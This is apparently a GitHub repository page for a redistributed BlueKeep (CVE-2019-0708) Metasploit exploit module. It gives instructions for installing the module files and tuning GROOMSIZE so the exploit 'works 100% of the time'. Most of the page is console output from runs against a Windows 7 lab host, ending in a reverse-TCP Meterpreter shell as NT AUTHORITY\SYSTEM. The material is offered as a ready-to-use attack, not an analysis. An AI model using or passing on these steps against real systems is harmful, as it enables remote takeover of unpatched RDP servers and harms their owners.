Skip to content

notnonot/bluekeep-exploit

 
 

Repository files navigation

bluekeep-exploit

Bluekeep(CVE 2019-0708) exploit released

https://blog.rapid7.com/2019/09/06/initial-metasploit-exploit-module-for-bluekeep-cve-2019-0708/

How To use:

Simply make folder named rdp (for convenience) in /usr/share/metasploit-framework/modules/exploits/windows/ paste this exploit file(cve_2019_0708_bluekeep_rce.rb) in the folder(rdp) and use ur metasploit skills

Also replace the files in following folders:- rdp.rb --> /usr/share/metasploit-framework/lib/msf/core/exploit/

rdp_scanner.rb --> /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp

cve_2019_0708_bluekeep.rb --> /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp

like: use exploit/windows/rdp/cve_2019_0708_bluekeep_rce

and then ur general concepts of setting rhosts,lhost,payload etc

Thanks to the Genius Group of People for their wonderful work

Note:[I am not the developer of this exploit but only an ethusiast of learning exploits]

HOW TO MAKE THE EXPLOIT WORK 100% OF THE TIME:

############################

You have to set the GROOMSIZE as show below with different combinations and error Also my VMWARE(15) windows hardware was 2GB RAM and 1 Core processor

Conclusion setting GROOMSIZE to 50 worked as good as gold

############################

  msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > set GROOMSIZE 100
 GROOMSIZE => 100
 msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > run

 [*] Started reverse TCP handler on 192.168.43.84:4444 
 [*] 192.168.43.137:3389   - Detected RDP on 192.168.43.137:3389   (Windows version: 6.1.7601) (Requires NLA: No)
 [+] 192.168.43.137:3389   - The target is vulnerable.
 [*] 192.168.43.137:3389 - Using CHUNK grooming strategy. Size 100MB, target address 0xfffffa801f000000, Channel count 1.
 [*] 192.168.43.137:3389 - Surfing channels ...
 [*] 192.168.43.137:3389 - Lobbing eggs ...
 [*] 192.168.43.137:3389 - Forcing the USE of FREE'd object ...
 [*] Exploit completed, but no session was created.
 msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > set GROOMSIZE 150
 GROOMSIZE => 150
 msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > run

 [*] Started reverse TCP handler on 192.168.43.84:4444 
 [*] 192.168.43.137:3389   - Detected RDP on 192.168.43.137:3389   (Windows version: 6.1.7601) (Requires NLA: No)
 [+] 192.168.43.137:3389   - The target is vulnerable.
 [*] 192.168.43.137:3389 - Using CHUNK grooming strategy. Size 150MB, target address 0xfffffa8022200000, Channel count 1.
 [*] 192.168.43.137:3389 - Surfing channels ...
 [*] 192.168.43.137:3389 - Lobbing eggs ...
 [-] 192.168.43.137:3389 - Exploit failed [disconnected]: Errno::ECONNRESET Connection reset by peer
 [*] Exploit completed, but no session was created.
 msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > set GROOMSIZE 50
 GROOMSIZE => 50
 msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > run

 [*] Started reverse TCP handler on 192.168.43.84:4444 
 [*] 192.168.43.137:3389   - Detected RDP on 192.168.43.137:3389   (Windows version: 6.1.7601) (Requires NLA: No)
 [+] 192.168.43.137:3389   - The target is vulnerable.
 [*] 192.168.43.137:3389 - Using CHUNK grooming strategy. Size 50MB, target address 0xfffffa801be00000, Channel count 1.
 [*] 192.168.43.137:3389 - Surfing channels ...
 [*] 192.168.43.137:3389 - Lobbing eggs ...
 [*] 192.168.43.137:3389 - Forcing the USE of FREE'd object ...
 [*] Sending stage (206403 bytes) to 192.168.43.137
 [*] Meterpreter session 2 opened (192.168.43.84:4444 -> 192.168.43.137:51854) at 2019-09-10 22:59:44 +0530

 meterpreter > getuid
 Server username: NT AUTHORITY\SYSTEM
 meterpreter > 

About

Bluekeep(CVE 2019-0708) exploit released

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages

  • Ruby 100.0%